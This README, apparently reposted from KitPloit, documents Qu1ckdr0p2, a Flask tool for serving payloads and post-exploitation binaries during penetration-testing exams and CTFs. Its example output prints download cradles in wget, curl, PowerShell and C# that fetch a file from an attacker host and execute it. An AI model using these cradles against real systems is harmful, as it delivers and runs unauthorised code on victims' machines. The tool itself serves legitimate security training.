Qu1Ckdr0P2 - Quicky Serve Files Over Http Or Https Using Flask
Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.
Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.
Pull requests and issues welcome. As are any contributions.
Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https
option, priority is also given to the tun0
interface when the webserver is running, otherwise it will use eth0
.
The common.ini defines the mapped aliases used within the --search and -u
options.
When the webserver is running there are several download cradles printed to the screen to copy and paste.
pip3 install qu1ckdr0p2echo "alias serv='~/.local/bin/serv'" >> ~/.zshrcsource ~/.zshrcorecho "alias serv='~/.local/bin/serv'" >> ~/.bashrcsource ~/.bashrcserv init --update
$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080
$ serv --help Usage: serv [OPTIONS] COMMAND [ARGS]... Welcome to qu1ckdr0p2 entry point.Options: --debug Enable debug mode. --help Show this message and exit.Commands: init Perform updates. serve Serve files.
$ serv serve --helpUsage: serv serve [OPTIONS] Serve files.Options: -l, --list List aliases -s, --search TEXT Search query for aliases -u, --use INTEGER Use an alias by a dynamic number -f, --file FILE Serve a file --http INTEGER Use HTTP with a custom port --https INTEGER Use HTTPS with a custom port -h, --help Show this message and exit.
$ serv init --help Usage: serv init [OPTIONS] Perform updates.Options: --update Check and download missing tools. --update-self Update the tool using pip. --update-self-test Used for dev testing, installs unstable build. --help Show this message and exit.
$ serv init --update
$ serv init --update-self
The mapped alias numbers for the -u
option are dynamic so you don't have to remember specific numbers or ever type out a tool name.
$ serv serve --search ligolo [→] Path: ~/.qu1ckdr0p2/windows/agent.exe[→] Alias: ligolo_agent_win[→] Use: 1[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe[→] Alias: ligolo_proxy_win[→] Use: 2[→] Path: ~/.qu1ckdr0p2/linux/agent[→] Alias: ligolo_agent_linux[→] Use: 3[→] Path: ~/.qu1ckdr0p2/linux/proxy[→] Alias: ligolo_proxy_linux[→] Use: 4(...)
$ serv serve --search ligolo -u 3 --http 80[→] Serving: ../../.qu1ckdr0p2/linux/agent[→] Protocol: http[→] IP address: 192.168.1.5[→] Port: 80[→] Interface: eth0[→] CTRL+C to quit[→] URL: http://192.168.1.5:80/agent[↓] csharp:$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'[↓] wget:wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent[↓] curl:curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent[↓] powershell:Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent⠧ Web server running
MIT
Source: www.kitploit.com